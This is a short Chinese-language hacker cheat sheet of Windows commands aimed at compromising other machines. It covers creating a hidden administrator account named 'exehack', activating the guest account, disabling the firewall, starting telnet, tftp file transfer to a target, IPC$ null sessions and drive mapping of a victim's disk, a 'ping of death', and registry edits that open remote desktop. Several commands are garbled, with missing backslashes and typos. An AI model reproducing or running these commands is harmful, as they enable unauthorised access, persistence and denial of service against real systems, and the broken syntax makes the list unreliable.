net user exehack exehack /add  添加用户

net localgroup administrators exehack /add   将exehack提升为管理员

net user exehack /del 删除exehack账号

net user guest /active:yes  激活GUEST用户

net stop sharedaccess 停XP自带防火墙

net start telnet  开TELNET服务

tftp -i 目标IP get 文件名 存放地址(目标主机)    TFTP上传命令

net use ipipc$ ” ” /user:” ” 建立IPC空链接 

net use ipipc$ “密码” /user:”用户名” 建立IPC非空链接 

net use h: ipc$ “密码” /user:”用户名” 直接登陆后映射对方C：到本地为H: 

net use h: ipc$ 登陆后映射对方C：到本地为H: 

net use ipipc$ /del 删除IPC链接 

net use h: /del 删除映射对方到本地的为H:的映射 

net password 密码 更改系统登陆密码 

netstat -a 查看开启了哪些端口,常用netstat -an 

netstat -n 查看端口的网络连接情况，常用netstat -an 

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） 

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 

ping -t -l 65550 ip (发送大于64K的文件并一直ping就成了死亡之ping) 

开启3389
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

查看远程终端
REG query HKLMSYSTEMCurrentControlSetControlTerminal” “ServerWinStationsRDP-Tcp /v PortNumber